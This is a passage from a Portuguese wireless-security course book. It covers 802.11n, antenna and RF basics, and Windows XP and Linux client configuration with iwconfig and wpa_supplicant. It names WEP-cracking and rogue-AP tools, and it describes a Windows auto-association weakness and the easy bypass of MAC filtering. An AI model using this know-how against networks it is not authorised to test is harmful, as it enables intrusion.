22 Microsoft Zune, Sandisk Sansa Connect, Apple iPod touch e iPhone.

Wi-Fi e telefonia IP
A empresa Skype introduziu em 2004 uma tecnologia de VoIP baseada em P2P (Peer-to-Peer),
que trouxe aos usuários comuns a telefonia IP de uma maneira mais fácil. Essa populari-
zação de VoIP veio ao encontro da popularização de Wi-Fi, e possibilitou a associação com
telefones IP sem fio.

Embora Skype seja o sistema de VoIP mais utilizado, há também telefones IP sem fio base-
Segurança em Redes sem Fio

ados em Session Initiation Protocol (SIP):

11 Belkin Wi-Fi Phone for Skype – F1PP000GN-SK: http://www.belkin.com/

11 T-Mobile @Home®: http://www.t-mobile.com/

11 Sansa Connect: http://www.sandisk.com/sansa/

20
Wi-Fi a bordo
11 Acesso dentro de aviões. q
11 Empresas: AirCell, Row 44, On Air, Aeromobile e Panasonic Avionics.

w 11 Wi-Fi e celular em aviões no Brasil em 2009.


Mais informações em: A TAM e a On Air anunciaram em setembro de 2008 que em 2009 os aviões Airbus A320
“On Air – Inflight da TAM passariam a contar com cobertura total de voz, SMS e Blackberry. Wi-Fi faz parte
Internet and mobile
telephony on Boeing do pacote de serviços da On Air. Em outubro de 2010, a TAM começou a oferecer acesso à
and Airbus aircraft”: telefonia móvel (voz, SMS e dados) em uma de suas aeronaves, e a previsão de ampliação
http://www.onair.aero/
desse serviço seria para o segundo semestre de 2011. Porém, ainda não há previsão para
habilitação de redes Wi-Fi nas aeronaves da TAM.

Padrão 802.11n
11 TGn - 802.11n Enhancements for Higher Throughput. q
11 Próxima geração de redes Wi-Fi.

11 Multiple-Input, Multiple-Output (MIMO).

22 600 Mbps.

11 Revolução na camada física (PHY), múltiplas antenas tanto na transmissão quanto


na recepção.

11 Tira proveito de multipath.

l O objetivo do TGn com 802.11n é a introdução de redes com velocidades de 100 Mbps pelo
Uma curiosidade: a uso de novas tecnologias de transmissão na camada física. Embora os APs, atualmente,
pronúncia correta é “My normalmente tenham mais de uma antena, há apenas um conjunto de componentes para
Moe”, não “Mee Moe”.
Essa pronúncia foi processar o sinal RF ou RF Chain. O transmissor tem um único RF chain de saída e o receptor
definida como padrão tem um único RF chain de entrada.
numa sessão plenária
da IEEE em 2004, após Com Multiple-Input/Multiple-Output (MIMO), cada RF chain é capaz de transmitir e receber
votação: 69 votos a
simultaneamente, o que aumenta consideravelmente a velocidade de transmissão da
favor de “My Moe”, 24 a
favor de “Mee Moe” e camada física (PHY). Além disso, o processamento simultâneo do receptor trata melhor de
outros 25 que se problemas com interferência por multipath.
abstiveram de votar.

Capítulo 1 - História, padrões e fundamentos de radiofrequência


Aprovação do draft de IEEE 802.11n
11 Draft proposto pelo EWC e aprovado pelo IEEE. q
11 “Pre-N” e compatíveis com o draft 802.11n.

11 Risco de incompatibilidade futura.

11 Abril de 2006.

11 Lynksys WRT300N “Wireless-N”.

w 802.11n.
Saiba mais no Enhanced 11 Versão final esperada para novembro de 2009.
Wireless Consortium
(EWC): http://www. Em 19 de janeiro de 2006, durante a reunião do grupo de trabalho IEEE 802.11, o 802.11n
enhancedwirelesscon-
Task Group (TGn) aprovou a proposta do Enhanced Wireless Consortium (EWC). Como era
sortium.org
esperado, diversos fabricantes já lançaram produtos baseados nesse draft.

21
22
Segurança em Redes sem Fio
Roteiro de Atividades 1
Atividade 1.1 – Matemática RF
Suponha que precisamos configurar uma WLAN. Nossa empresa decidiu cortar custos e
determinou que estruturássemos a WLAN em Access Points baseados em Linux. Antes de
configurá-los (o que aprenderemos a fazer no próximo Capítulo), teremos de instalar a inter-
face WLAN, cabos e antena. Temos os seguintes equipamentos:

11 Uma interface de rede com potência de 200 mW;

11 Dois conectores de cabo;

11 Antena de 25 dBi.

Considerando que 1.000 mW é equivalente a 1 W e que cada conector insere 1 dBi de perda,
calcule a Effective Isotropic Radiated Power (EIRP) do sistema. Consulte o material do Capí-
tulo teórico correspondente para efetuar esse cálculo.

Atividade 1.2 – Órgãos reguladores


Consulte a Resolução 506 da Agência Nacional de Telecomunicações (Anatel), que inclui o
Regulamento sobre Equipamentos de Radiocomunicação de Radiação Restrita, e conclua se
o EIRP do seu sistema está de acordo com as normas da Anatel. Caso não esteja, proponha
pelo menos duas soluções que resolvam o problema e deixem seu sistema em conformi-
dade com a norma estabelecida.

Atividade 1.3 – IEEE 802.11n


Vimos que o próximo padrão de redes 802.11 é IEEE 802.11n (Standard for Enhancements for
Higher Throughput), que elevará a velocidade das WLAN para outro patamar.

Assim como ocorreu com WPA (pré-padrão), que foi baseado no draft de 802.11i, hoje
diversos fabricantes já estão oferecendo equipamentos baseados no draft de 802.11n.

Suponha que seu gerente seja um “early adopter”, ou seja, uma pessoa que adota novas
Capítulo 1 - Roteiro de Atividades

tecnologias tão logo elas surjam. Usando, como argumentos, características dos padrões
802.11a/b/g, requerimentos de tráfego entre equipamentos da WLAN e problemas que os
atuais equipamentos baseados na versão draft de 802.11n apresentaram (consulte referên-
cias a seguir), convença-o a desistir de implantar esses novos equipamentos na organização.

Referências:

11 Status of Project IEEE 802.11n: Standard for Enhancements for Higher Throughput:
http://grouper.ieee.org/groups/802/11/Reports/tgn_update.htm

11 ZDNet: How to jam your neighbor’s Wi-Fi legally: http://blogs.zdnet.com

23
11 Tom’s Networking: Draft 802.11n Revealed: Part 1: The Real Story on Throughput vs.
Range e Part 2: Interoperable? Not so much: http://www.tomsnetworking.com

Atividade 1.4 – WPA2 e RSN


Defina Wi-Fi (Protected Access WPA), Wi-Fi Protected Access (2WPA2) e Robust Security
Network (RSN) com base no documento SP800-97 do NIST, explicando como certificação
(WPA2) e conceito (RSN) se relacionam.

Atividade 1.5 – Projeto de WLAN com intersecção de células


Suponha que precisamos configurar WLAN para a nossa empresa. Foi realizado uma compra
de cinco Access Points, um para cada departamento. Esses Access Points devem ser confi-
gurados de forma a evitar interferências entre as redes, evitando assim colisões e retrans-
missão de pacotes. A figura a seguir apresenta o raio de ação da irradiação da antena de
cada Access Point. Todos os Access Points são 802.11b/g homologados para funcionamento
no Brasil.

Diretoria AP-05
AP-01
Engenharia

AP-02
Administração

AP-03 AP-04
Figura 1.8
Recursos Humanos TI
Raio da irradiação
da antena de cada
AP.

Preencha a tabela a seguir com o canal que cada AP de estar configurado:

AP SSID CANAL

01 Diretoria

02 Administração

03 RH

04 TI

05 Engenharia
Segurança em Redes sem Fio

24
2
WLAN: equipamentos
e configuração
objetivos

Apresentar os dispositivos típicos de uma WLAN, a configuração de clientes e


os problemas relacionados, em redes Windows e Linux; identificar os componentes
de uma rede sem fio.

conceitos
Configuração de clientes WLAN.

Introdução
Access Point (AP): q
11 Elemento-chave de uma WLAN.

11 Ponto de acesso à rede cabeada.

11 Principais modos:

22 Root (padrão).

22 Repeater.

22 Bridge.

O AP é o principal elemento de uma WLAN. Normalmente, é responsável por conectar os


clientes à rede cabeada, por meio da interface Ethernet. Esse modo é conhecido como Root.
Capítulo 2 - WLAN: equipamentos e configuração
Outros modos de operação:

11 Bridge: usado para ligar dois segmentos de rede cabeados por meio de uma rede sem fio;

11 Repeater: um AP em modo Repeater se conecta a um AP em modo Root como cliente, e os


clientes, por sua vez, se conectam ao AP Repeater.

Exercício de nivelamento 1 e
WLAN
O que é uma WLAN?

25
Acess Point
Opções típicas: q
11 Potência ajustável.

11 Firewall básico.

11 Antenas destacáveis.

11 Filtro por MAC.

11 Servidor DHCP para WLAN e LAN (portas RJ-45).

11 Atualização de firmware.

Os APs mais comuns do mercado são, na realidade, Broadband Routers; ou seja, não se
limitam ao papel de “switch sem fio” – oferecem diversas funcionalidades interessantes a
um dispositivo e normalmente exercem o papel de gateway. Uma função característica de
um gateway presente nesses equipamentos é a de servidor DHCP, importante na alocação
dinâmica de endereços IP para os clientes que se associam ao AP. Os endereços mais
usados nesse tipo de servidor são os das classes 10/8 (10.0.0.0-10.255.255.255), 172.16/12
(172.16.0.0-172.31.255.255) e 192.168/16 (192.168.0.0). Essas redes são especificadas na RFC
1918 (Address Allocation for Private Internets).

O ajuste da potência de transmissão é mal interpretado como sendo uma medida de segu-
rança. Possui alguma utilidade como maneira de se evitar que atacantes capturem tráfego
na preparação de ataques contra a WLAN (como WEP, WPA; mas é difícil conter as ondas
de rádio). É melhor que o administrador de rede se empenhe em tornar a WLAN segura
por criptografia e outros mecanismos do que pela diminuição da potência, que ainda pode
impedir que certos clientes se conectem. Outra função mal interpretada como associada à
segurança é o filtro por endereço Medium Access Control (MAC), que restringe a associação
de clientes a apenas uma relação previamente conhecida. Essa opção detém apenas usuá-
rios comuns, já que é trivial alterar esse endereço para se fazer passar por outra interface.

Outra função típica é a de firewall, ou seja, um filtro de pacotes básico com base em ende-
reços e portas TCP/IP de origem e destino. Por meio dessa funcionalidade é possível, por
exemplo, ter acesso à interface administrativa não apenas por intermédio da WLAN, o que é
mais comum, mas também por meio da LAN.

A atualização de firmware é um aspecto interessante para explorar os recursos do


equipamento com um sistema operacional do dispositivo alternativo ou para eli-
minar bugs e vulnerabilidades de segurança.

Clientes WLAN
Fit AP: q
Segurança em Redes sem Fio

11 Também chamados de Fat APs.

11 Inteligência no AP.

11 Configuração individual.

11 Administração trabalhosa.

Thin AP:

11 Figura do switch centralizado.

11 APs “burros”.

11 Configuração centralizada.
26
w A escolha de clientes é muito importante, especialmente quando a compatibilidade sob
Para verificar a Linux importa. Outro aspecto importante é a incompatibilidade entre marcas diferentes, em
compatibilidade de especial nos padrões proprietários de aceleração – Afterburner/SpeedBooster da Broadcom
uma interface sob
Linux, consulte o site: e D-Link AirPlus Extreme, por exemplo.
http://linux-wless.
passys.nl/ Dê preferência para as interfaces com chipsets Atheros ou Ralink. Há ferramentas de auditoria
muito úteis que podem ser executadas somente com uma determinada interface e driver.

Figura 2.1
Tipos de interfaces
para redes sem fio.

Conceitos sobre antenas


Polarização: q
11 Horizontal.

11 Vertical.

11 Ganho medido em dBi.

Beamwidth:

11 Horizontal.

11 Vertical.

11 Perdas no caminho (Free Space Path Loss) – maior fonte de perda.

22 Maior frequência, maior FSPL, menor distância.

11 Polarização: orientação física da antena. Ondas de rádio são compostas de dois campos,
elétrico e magnético. Na polarização Horizontal, o campo elétrico é paralelo à superfície
da Terra enquanto que, na Vertical, o campo elétrico é perpendicular;

11 Ganho: medido em dBi (decibels referenced to an isotropic radiator). Não é possível criar
um irradiador isotrópico, como o sol, apenas 360º no plano Horizontal. O padrão de irra-
diação tem a forma de uma rosca. Antenas, por seu caráter passivo, não fazem nada mais
do que “espremer” a rosca para aumentar a abrangência;

11 Beamwidth: largura do sinal RF que a antena transmite, aumento e diminuição no ganho


Capítulo 2 - WLAN: equipamentos e configuração

de uma antena. É medido em graus e também tem como referência a superfície da Terra.
Valores mais comuns por tipo de antena:

22 Omni: H 360º V 7-8º;

22 Patch: H 30-180º V 6-90º;

22 Yagi: H 30-78º V 14-64º;

22 Dish (prato): H 4-24º V 4-21º;

22 Free Space Path Loss: perda no sinal RF por dispersão, principalmente.

Fórmula para FSPL, onde “F” é frequência e “d”, a distância em metros: FSPL (dB) = 32.5 + 20
log F + log d.

27
A 100 metros de distância, por exemplo, a perda por PL é de 80.23 dB.

Antena Omnidirecional (dipolo)


11 Mais comum. q
11 Irradia energia igualmente em torno de seu eixo.

11 Aumento no ganho.

22 Rosca se torna uma panqueca.

Figura 2.2
Antena
Omnidirecional
(dipolo).

Antena Semidirecional
11 Painel e Yagi (ilustrações). q
11 Irradia mais em uma direção.

11 Alto ganho, normalmente a partir de 8.5 dBi.

11 Útil para bridge entre pontos um pouco mais distantes.


Segurança em Redes sem Fio

Figura 2.3
Antena
Semidirecional.

28
Antena altamente direcional
11 Comunicação ponto a ponto. q
11 Beamwidth estreito.

22 Foco direcionado.

22 Maior alcance.

Figura 2.4
Antena altamente
direcional.

Os gráficos que ilustram o padrão de irradiação foram gerados pelo Numerical Electromagnetic
Code (NEC) Finite-Element Antenna Simulator – Lawrence Livermore Laboratories.

Amplificadores
11 Aumentam a amplitude de um sinal de RF e a sensibilidade. q
11 Dois tipos:

22 Unidirecional (envio).

22 Bidirecional (envio e recepção).

11 Ganho fixo ou variável.

Atenuadores
11 Necessários para provocar perda calculada. q
11 Evitam violações nas determinações de FCC/Anatel.

Capítulo 2 - WLAN: equipamentos e configuração

Figura 2.5
Amplificador.

Splitter
11 Divide sinal em múltiplos sinais RF. q
11 Aplicação em múltiplas antenas.

11 Não recomendado.

22 Introduz perda.

29
Figura 2.6
Splitter.

Conectores
11 Proprietários. q
11 Impedância deve combinar com cabos.

22 Voltage Standing Wave Ratio (VSWR).

11 Mais comuns: N-type e SMA.

Figura 2.7
Conectores.

Cabos
11 Principais: Andrew, Times Microware e Belden. q
11 Mais usado: Times Microwave LMR.

22 Maior número, menor perda.

22 LMR-100, LMR-400 e LMR-800.

Cuidados:

11 Mais curto possível (perda).

11 Mesma impedância dos outros componentes (VSWR) e frequência superior (2.5 GHz
para WLAN 2.4 GHz).

11 Procure por cabos manufaturados, não montados.

11 Escolha aquele com menor perda.

Exercício de fixação 1 e
Segurança em Redes sem Fio

WLAN: equipamentos e acessórios


1. O que é um AP?

30
2. O que é polarização?

3. Quais os tipos de antenas existentes?

Configuração de clientes
Windows
11 Plataforma nativa de praticamente todas as interfaces. q
11 Wireless Zero Configuration Service (WZCSVC).

11 Sem suporte a RFMON.

22 Captura de quadros 802.11 de gerenciamento.

11 Esquemas mais comuns:

22 Autenticação: WEP (inseguro), WPA, WPA-PSK, WPA2 e WPA2-PSK.

22 Criptografia: TKIP (WPA) e AES (WPA2).

22 EAP Types: PEAP (PEAPv0/EAP-MSCHAPv2) e EAP-TLS.

Lembretes no Windows:

11 Desativar WZCSVC, caso opte por controlar a interface pelo serviço do fabricante.

11 Restringir associações a redes de infraestrutura ou ad-hoc (Advanced).

Definição dos parâmetros de WLAN:

11 WZCSVC.

22 Associação ao AP simplificada.

O suporte a interfaces WLAN no Microsoft Windows está voltado à facilidade de uso. Alguns
detalhes úteis a um usuário mais avançado – como BSSID do AP – são omitidos, de forma
que dois APs distintos com o mesmo SSID são exibidos como sendo um único SSID.

É importante observar que o uso do serviço WZCSVC é facultativo na maioria das vezes, já Capítulo 2 - WLAN: equipamentos e configuração
que as interfaces normalmente são acompanhadas de drivers do fabricante. Entretanto, é
preciso escolher qual dos serviços controlará a interface – se escolher pelo serviço do fabri-
cante, devemos desativar o WZCSVC, conforme veremos a seguir.

31
Em janeiro de 2006, durante a conferência ShmooCon 2006, Mark “Simple Nomad” Loveless Figura 2.8
anunciou uma vulnerabilidade na escolha automática de redes do WZCSVC. Desativando o
WZCSVC.
Suponha que o notebook de Alice está configurado para usar um SSID “CASA”. Fora do alcance
de seu AP, se Bob configurar sua estação com o mesmo SSID, o notebook de Alice se associa Figura 2.9
à rede ad-hoc de mesmo nome. Na próxima vez que Alice ligar seu notebook sem um AP com Restringir
associações a redes
SSID “CASA” nas proximidades, ele passará a anunciar uma rede ad-hoc com SSID “CASA”. de infraestrutura ou
‘ad-hoc’ (Advanced).
Linux
11 Drivers ainda constituem um problema. q
11 Chipsets melhor suportados por drivers e ferramentas:

22 Prism, Orinoco e Atheros (nesta ordem).

11 Demais chipsets:

22 Suporte muitas vezes parcial.

22 Sem o modo RFMON.

11 Drivers:

22 Hostap – chipset Prism

22 WLAN-ng.

22 MADWIFI – chipset Atheros.

22 Wavelan – chipset Orinoco.

22 RT73 – Ralink.

22 Ndiswrapper – instalação de driver Windows (.INF) sob Linux.

11 Utilitários:

22 Wireless Tools (WT).

22 iwconfig, iwlist, iwspy, iwpriv, ifrename.


Segurança em Redes sem Fio

11 Definição dos parâmetros de WLAN:

22 Iwconfig:

33 Canal, SSID, modo, chave e taxa de transmissão.

32
11 Interfaces Atheros com módulo MadWifi: q
22 wlanconfig.

11 Modo “master”:

22 Primeiro passo para transformar uma estação em um AP.

Alguns softwares e sua compatibilidade entre os chipsets:

A = Atheros cards / O = Orinoco cards / P = Prism cards / R = Ralink cards.

11 Kismet AOPR;

11 Wellenreiter O;

11 Karma APR;

11 Aircrack AOPR;

11 Aircrack-ng AOPR;

11 Airsnort OP;

11 WEPAttack AOPR;

11 WEPCrack AOPR;

11 FakeAP P (Airbase-ng AR);


w 11 Void11 P (mdk3 AR);

O site “Linux wireless 11 Wifitap AP;


LAN support” compila
interfaces suportadas 11 Wireshark AOPR.
em Linux por fabri-
Drivers baseados nos chipsets Prism, Atheros e Ralink são altamente recomendáveis, pois
cante, tipo de interface
(PCI, USB, PCMCIA etc.) são os mais suportados por utilitários Linux. Isso se deve às ferramentas disponíveis que, na
ou chipset, facilitando a maioria dos casos, exigem drivers HostAP (chipset Prism), MadWifi (chipset Atheros) e RT73
escolha de um usuário
(chipset Ralink).
mais exigente.

As marcas e modelos disponíveis no mercado são várias e o suporte a Linux é imprevisível.

Capítulo 2 - WLAN: equipamentos e configuração

33
34
Segurança em Redes sem Fio
Roteiro de Atividades 2
Atividade 2.1 – Configuração de um cliente Windows
Neste primeiro exercício, configuraremos um cliente Windows para uma rede típica.
A configuração de um cliente Windows para uma WLAN WEP, para uma WPA Personal
(WPA-PSK) ou para uma WPA2-Personal (WPA2-PSK) difere apenas na solicitação de uma
senha. Note que nem todas as interfaces de rede são capazes de se associar a redes WPA
e WPA2, Personal (PSK) ou Enterprise. Isso se deve ao suporte de hardware e software
(drivers), o que não existia para alguns equipamentos mais antigos. Portanto, esse problema
não acontecerá nesta atividade, uma vez que as interfaces de rede adotadas são compatí-
veis com os padrões de segurança mais recentes.

Verificando o status do serviço Wireless Zero Configuration


Se a instalação do driver da interface de rede WLAN ocorreu com sucesso, é bem provável
que o gerenciamento da interface seja feito por meio do serviço Wireless Zero Configuration
(WZCSVC) ou “Configuração zero sem fio”, padrão no Windows XP. Para verificar se o serviço
está ativo, siga os seguintes passos:

1. Siga a seguinte sequência de menus, a partir do menu “Start/Iniciar”:

11 Windows XP em inglês:

“Start”, “Control Panel”, “Administrative Tools” e “Services”.

11 Windows XP em português:

“Iniciar”, “Painel de Controle”, “Ferramentas Administrativas” e “Serviços”.

Capítulo 2 - Roteiro de Atividades

35
2. Quando o serviço está ativo, tendo sido disparado quando o sistema foi ligado (caso
típico), os campos “Status” e “Startup Type” exibem os valores “Started” e “Automatic”,
respectivamente. Isso pode ser confirmado clicando com o botão direito do mouse sobre
a entrada “Wireless Zero Configuration” (conforme figura anterior), e em seguida selecio-
nando “Properties/Propriedades”.

3. O serviço também pode ser iniciado via prompt de comando executando o comando net
start wzcsvc.

Uma vez garantido que o serviço WZCSVC esteja em operação, podemos partir para a confi-
guração da interface WLAN.
Segurança em Redes sem Fio

36
Configuração básica de uma interface de rede
A configuração de uma interface WLAN em Windows XP é bem simples e intuitiva. Existem
diversos caminhos para se chegar à interface gráfica de configuração, mas aqui descreve-
remos o que consideramos típico de uma instalação padrão de Windows XP.

A interface de seleção de redes disponíveis pode ser chamada tanto pela opção “Open
Network Connections” quanto pela opção “View Available Wireless Networks”. Seleciona-
remos a primeira opção, para que tenhamos uma visão mais ampla de como a interface
WLAN se comporta no sistema.

A interface WLAN se comporta como uma interface Ethernet para o sistema, inclusive na
forma como recebe os pacotes da camada física da rede. Veremos que uma vez associado à
rede com auxílio do serviço WZCSVC ou do driver do fabricante, o cliente recebe tráfego de
rede como se fosse uma interface Ethernet. Para a pilha TCP/IP do sistema operacional (SO)
não importa se a camada de rede (IP) recebe pacotes de uma interface Token Ring, 802.11 ou
Ethernet – o driver se encarrega de entregar para a camada IP pacotes no formato esperado
por esta camada de rede.
Capítulo 2 - Roteiro de Atividades

Ao clicar duas vezes sobre a interface de rede WLAN, finalmente chegamos à interface
gráfica do Wireless Zero Configuration.

Redes sem nenhum mecanismo de segurança apresentam a legenda “Unsecured wireless


network”. Para se associar à rede, basta clicar sobre a rede desejada (ESR-WIFISEG). Uma
mensagem de confirmação normalmente é exibida, confirmando se o usuário realmente
deseja associar o cliente a uma rede sem segurança.

37
Ao clicar em “Connect Anyway/Conectar de qualquer forma”, o processo de associação é
iniciado. Uma vez associada, a interface é entregue à camada IP de TCP/IP que, tipicamente,
tenta configurar a interface por DHCP. Quando a interface gráfica do WZCSVC exibir o texto
“Connected/Conectado”, sua interface WLAN já foi configurada com um endereço IP e a
configuração está concluída. Note que, em nenhum momento, a interface gráfica informa o
canal da rede em questão.

Considerações sobre segurança


Tal como uma interface Ethernet, a interface WLAN normalmente é configurada automatica-
mente com algumas opções que recomendamos desativar, em especial as relativas a redes
ad-hoc. Selecione na janela “Network Connections” (há outros caminhos também) a interface
em questão (Wi-Fi) com o botão direito do mouse e, depois, escolha a opção “Properties”.
Depois, selecione a aba “Wireless Networks”, conforme mostrado na ilustração a seguir.
Segurança em Redes sem Fio

38
Clique no botão “Advanced” (seção inferior direita) para definir os tipos de rede aos quais o
cliente poderá se associar.

A possibilidade de associação automática a redes preferidas (Preferred) é um dos grandes


problemas de clientes WLAN Windows. Como foi apresentado na conferência hacker
ShmooCon 2006, a forma como o WZCSVC seleciona as redes pode levar à associação com
um nó ad-hoc com o mesmo nome da rede preferida. Configure a interface de modo que
Capítulo 2 - Roteiro de Atividades

apenas associações com Access Points sejam permitidas, ou seja, em uma rede infraestrutu-
rada. Desmarcar a opção “Automatically connect…” (mostrada na ilustração anterior) impede
que o cliente se associe automaticamente a redes não conhecidas previamente.

Atividade 2.2 – Configuração de um cliente Linux


Assim como ocorre em um cliente Windows, antes de configurar a interface WLAN é neces-
sário verificar se o driver (módulo em Linux) está devidamente instalado e carregado. Em
seguida, configuraremos a interface para as WLAN mais típicas: aberta, WEP e WPA/WPA2.

39
Não utilizaremos interfaces gráficas para a configuração em Linux porque variam de distri-
buição para distribuição. A configuração por linha de comando, por outro lado, dá ao aluno
uma visão mais detalhada das etapas da configuração de uma interface WLAN.

Antes de qualquer comando, certifique-se de que seu usuário detém privilégios de superu-
suário – ou seja, root. Em sua máquina virtual VMware do BackTrack 3, execute o seguinte
comando em um console:

# sudo su –

Verificando a presença e a atividade dos drivers


Para verificar se já existem interfaces 802.11 reconhecidas, execute o comando iwconfig sem
nenhum parâmetro.

# iwconfig

lo no wireless extensions.

eth0 no wireless extensions.

rausb0 IEEE 802.11g ESSID:off/any

Mode:Managed Frequency:2.437 GHz Access Point: Not-Associated

Bit Rate:54 Mb/s Tx-Power:25 dBm

RTS thr:2347 B Fragment thr:2346 B

Encryption key:off

Power Management:off

Link Quality:0 Signal level:0 Noise level:0

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

A resposta do comando informou que há uma interface com nome rausb0 ativa, ou seja, não
é necessário instalar ou carregar módulos (drivers). No caso do nosso laboratório, encon-
traremos sempre interfaces com nome rausb0, normalmente o nome padrão atribuído a
interfaces Ralink com módulo rt73.

Caso a resposta do comando anterior informe que não há nenhuma interface com exten-
sões wireless (no wireless extensions), será necessário instalar ou simplesmente carregar o
módulo (driver). Uma vez que o módulo é rt73:
Segurança em Redes sem Fio

# modinfo rt73

# modprobe -v rt73

Depois de instalado, o sistema lista o driver como instalado. Confirme se os módulos foram
carregados, executando o seguinte comando:

# lsmod

40
Apenas para informação, os arquivos de módulos normalmente ficam nos seguintes diretórios:

/lib/modules/2.6.x

Comandos básicos de configuração


Linux oferece um conjunto de utilitários essenciais na configuração de uma interface WLAN.

O utilitário que exerce o papel de supplicant na infraestrutura 802.1x é wpa_supplicant.


O conjunto de ferramentas “Wireless Tools for Linux”, presente em praticamente qualquer
distribuição Linux, é composto das seguintes ferramentas:

11 Iwconfig: parâmetros básicos;

11 iwlist: varredura por redes, listando frequências oferecidas pelo AP, taxas de trans-
missão (bit-rate) e outras configurações;

11 iwspy: exibe qualidade do link;

11 iwpriv: manipulação de extensões wireless específicas de um driver (private);

11 ifrename: permite nomear interfaces com base em critérios estáticos.

Configuração básica de uma interface de rede – rede aberta


Para buscar por redes nos arredores, execute os seguintes comandos:

# ifconfig rausb0 up

# iwlist rausb0 scan

rausb0 Scan completed :

Cell 01 - Address: 00:14:BF:XX:XX:XX

ESSID:”rnpesr”

Protocol:IEEE 802.11g

Mode:Managed

Frequency:2.437 GHz (Channel 06)

Quality:0/100 Signal level:-32 dBm Noise


level:-256 dBm

Encryption key:off

Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18


Mb/s

24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9


Mb/s
Capítulo 2 - Roteiro de Atividades

12 Mb/s; 48 Mb/s

Extra:bcn_int=100

Extra:atim=0

41
Pela saída desse comando, é possível conhecer a rede à qual nosso cliente se conectará.
O exemplo mostra o SSID “rnpesr” e o canal é 6 (2.437 GHz). De posse desses dados, já
podemos configurar a interface para uma rede aberta. Verifique qual será o SSID e canal
utilizados no laboratório:

# iwconfig rausb0 mode managed essid rnpesr channel 6

# iwconfig rausb0

rausb0 IEEE 802.11g ESSID:”rnpesr”

Mode:Managed Frequency:2.437 GHz Access Point:


00:14:BF:XX:XX:XX

Bit Rate:54 Mb/s Tx-Power:25 dBm

RTS thr:2347 B Fragment thr:2346 B

Encryption key:off

Power Management:off

Link Quality:100/100 Signal level:-35 dBm Noise level:-256 dBm

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

11 O modo managed indica que a interface está sendo configurada para se associar a um AP.
Outros modos comuns são: monitor (para captura de quadros de dados, controle e geren-
ciamento), master (permite que a interface aja como AP) e ad-hoc (células sem um AP).

Uma vez configurada a interface, já é possível configurar um endereço IP ou configurar a


interface automaticamente por DHCP.

# dhcpcd rausb0

Configuração básica de uma interface de rede – WEP


A configuração de uma rede WEP 104 bits, popularmente conhecida como 128 bits, difere
em apenas um parâmetro a mais do comando iwconfig: key, com a chave em hexadecimal.

# iwconfig rausb0 channel 6 essid rnpesr mode managed key


11111AAAAA11111AAAAAEEEEE0

Depois de configurada a interface, já é possível configurar parâmetros de rede (IP, máscara


de rede, gateway), seja manualmente ou por DHCP. Uma interface configurada para uma
rede WEP apresenta a seguinte configuração:
Segurança em Redes sem Fio

# iwconfig rausb0

rausb0 IEEE 802.11g ESSID:”rnpesr”

Mode:Managed Frequency:2.437 GHz Access Point:


00:14:BF:XX:XX:XX

Bit Rate:54 Mb/s Tx-Power:25 dBm

RTS thr:2347 B Fragment thr:2346 B

42
Encryption key:1111-1AAA-AA11-111A-AAAA-EEEE-E0 Security
mode:restricted

Power Management:off

Link Quality:100/100 Signal level:-57 dBm Noise level:-256


dBm

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Configuração básica de uma interface de rede – WPA


A configuração de uma rede com WPA requer um utilitário adicional: wpa_supplicant. Esse
utilitário impõe algumas limitações, uma vez que não oferece suporte a todos os drivers
Linux. Outro fator limitante é a própria interface, que pode não oferecer suporte a WPA,
assim como mecanismos de segurança mais recentes. Atualmente (versão 0.5.10), os únicos
drivers com suporte são:

11 hostap: Host AP driver (Intersil Prism2/2.5/3).

11 madwifi: MADWIFI 802.11 support (Atheros etc.).

11 atmel: ATMEL AT76C5XXx (USB, PCMCIA).

11 wext: Linux wireless extensions (generic).

11 ndiswrapper: Linux ndiswrapper.

11 ipw: Intel ipw2100/2200 driver.

11 wired: wpa_supplicant wired Ethernet driver.

Caso você esteja usando um driver diferente, o processo de autenticação ou associação não
será concluído. A configuração inicial da interface é igual à de uma rede aberta.

# iwconfig rausb0 mode managed essid rnpesr channel 6

Usaremos apenas alguns parâmetros do comando wpa_supplicant; para uma lista completa,
consulte a ajuda on-line do mesmo comando “man wpa_supplicant” ou, simplesmente,
execute o comando sem parâmetros. As opções que utilizaremos são:

-B = run daemon in the background


-c = configuration file
-i = interface name
-d = increase debugging verbosity (-dd even more)
-D = driver name

Para a rede WPA configurada e antes de executarmos o comando wpa_supplicant...,


Capítulo 2 - Roteiro de Atividades

editaremos em qualquer editor de texto (gedit, vi) o arquivo de configuração wpa-psk-tkip.


conf em “/etc/wpa_supplicant”. Se o diretório não existir, crie o mesmo com o comando
mkdir /etc/wpa_supplicant:

# WPA-PSK/TKIP

ctrl_interface=/var/run/wpa_supplicant

43
network={

ssid=”rnpesr”

key_mgmt=WPA-PSK

proto=WPA

pairwise=TKIP

group=TKIP

psk=”chave compartilhada”

}
Para testar se a configuração está correta, execute o seguinte comando:

# wpa_supplicant -d –Dwext –irausb0 -c/etc/wpa_supplicant/wpa-psk-


tkip.conf

Atenção ao driver e interfaces compatíveis com o WPA para obter sucesso na associação.
A opção “-d” exibirá todas as mensagens da transação. Para configuração automática,
a opção “-B” é mais conveniente, já que mantém o programa em execução, porém em
segundo plano (background).

# wpa_supplicant -B –Dwext –irausb0 -c/etc/wpa_supplicant/wpa-psk-


tkip.conf

Uma vez concluído com sucesso (veja com atenção a saída do comando com a opção “-d”), a
associação é realizada. Abaixo, uma saída típica indicando o sucesso da associação:

State: GROUP_HANDSHAKE -> COMPLETED

CTRL-EVENT-CONNECTED - Connection to 00:14:bf:xx:xx:xx completed


(auth)

EAPOL: External notification - portValid=1

EAPOL: External notification - EAP success=1

EAPOL: SUPP_PAE entering state AUTHENTICATING

EAPOL: SUPP_BE entering state SUCCESS

EAP: EAP entering state DISABLED

EAPOL: SUPP_PAE entering state AUTHENTICATED

EAPOL: SUPP_BE entering state IDLE

EAPOL: startWhen --> 0


Segurança em Redes sem Fio

Uma vez associado à rede, o cliente pode prosseguir com a configuração dos parâmetros
de rede, normalmente por meio da execução de um cliente DHCP. Note que o processo do
wpa_supplicant deverá permanecer ao longo de toda a duração da associação.

# dhcpcd rausb0

44
Configuração com a ferramenta wicd
O wicd é um gerenciador de redes sem-fio para Linux, que visa fornecer uma interface
